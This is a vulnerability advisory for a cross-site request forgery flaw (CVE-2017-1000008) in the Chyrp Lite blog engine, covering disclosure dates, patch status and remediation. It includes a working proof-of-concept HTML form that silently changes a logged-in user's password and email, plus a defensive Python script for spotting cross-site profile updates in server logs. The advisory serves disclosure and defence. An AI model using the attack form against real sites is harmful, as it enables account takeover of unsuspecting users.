Product: Chyrp Lite
Vendor: Open source community
Version: 2016.04 “Lago” and earlier
Category: Cross site request forgery (CSRF)
Vendor Notified: 2017-01-05
Patched: 2017-01-06
Disclosed: 2017-03-06
Researcher(s): Carl Pearson
CVE: CVE-2017-1000008

A cross-site request forgery (CSRF) vulnerability exists in the user properties function of the Chyrp Lite blog engine. An unauthenticated remote attacker can exploit the vulnerability by tricking authenticated users into visiting a webpage under attacker control.

Proof of Concept
Example HTML attack form:
[code language="html"]
<!-- The form submits when this button is clicked. -->
<button onclick="document.csrf_form.submit()">Click to run</button>
<!-- Edit the 'action' attribute to reflect the IP address or hostname of the victim's Chyrp install. -->
<form name="csrf_form" id="csrf_form" method="POST" action="http://[host]/?action=controls">
<input class="text" type="text" name="login" value="user" id="login" disabled="disabled"/>
<input type="text" name="full_name" value="" id="full_name" tabindex="1"/>
<input type="text" name="email" value="[email protected]" id="email" tabindex="1"/>
<input type="text" name="website" value="" id="website" tabindex="1"/>
<input type="password" name="new_password1" value="apple" id="new_password1"/>
<input type="password" name="new_password2" value="apple" id="new_password2"/>
</form>
[/code]

If successful, an attacker can arbitrarily change the user’s password, email, and username to any desired values.

Chyrp Lite version 2017.01 “Swainson” patches this issue. Updating any existing Chyrp Lite installs is recommended.
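
For installs that ran 2016.04 or earlier, web server logs can be reviewed for profile updates that did not originate from the blog's own pages. The following is an added example, not part of the original advisory or of Chyrp Lite's code; it assumes Combined Log Format, and the hostname `blog.example.test`, the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def classify(line, site_hosts):
    """Return None unless the line is a POST to ?action=controls,
    otherwise (verdict, timestamp, client_ip, referer)."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "POST":
        return None
    if parse_qs(urlsplit(m["target"]).query).get("action") != ["controls"]:
        return None
    referer = m["referer"]
    if referer in ("", "-"):
        verdict = "no-referer"  # inconclusive: browsers can omit the header
    else:
        host = (urlsplit(referer).hostname or "").lower()
        verdict = "same-site" if host in site_hosts else "cross-site"
    return verdict, m["ts"], m["ip"], referer

def suspicious_posts(lines, site_hosts):
    """Return the profile-update POSTs that did not come from the blog's own pages."""
    hosts = {h.lower() for h in site_hosts}
    results = (classify(line, hosts) for line in lines)
    return [r for r in results if r and r[0] != "same-site"]

# Constructed sample log lines (documentation IP ranges, hypothetical hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jan/2017:10:01:12 +0000] "POST /?action=controls HTTP/1.1" 302 0 "http://blog.example.test/?action=controls" "Mozilla/5.0"',
    '192.0.2.10 - - [05/Jan/2017:10:07:40 +0000] "POST /?action=controls HTTP/1.1" 302 0 "http://other.example.net/page.html" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Jan/2017:10:09:03 +0000] "POST /?action=controls HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [05/Jan/2017:10:09:30 +0000] "GET /?action=controls HTTP/1.1" 200 5120 "http://blog.example.test/" "Mozilla/5.0"',
    '203.0.113.5 - - [05/Jan/2017:10:11:00 +0000] "POST /?action=login HTTP/1.1" 302 0 "http://blog.example.test/?action=login" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for verdict, ts, ip, referer in suspicious_posts(SAMPLE_LOG, ["blog.example.test"]):
        print(f"{ts}  {ip}  {verdict}  referer={referer}")
```

A `cross-site` hit is a candidate for follow-up, not proof of compromise; correlate it with unexpected password or email changes on the affected account.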

Project home:
v2017.01 release notes:
OWASP CSRF overview:

Edit 7/13/17: CVE identifier added.
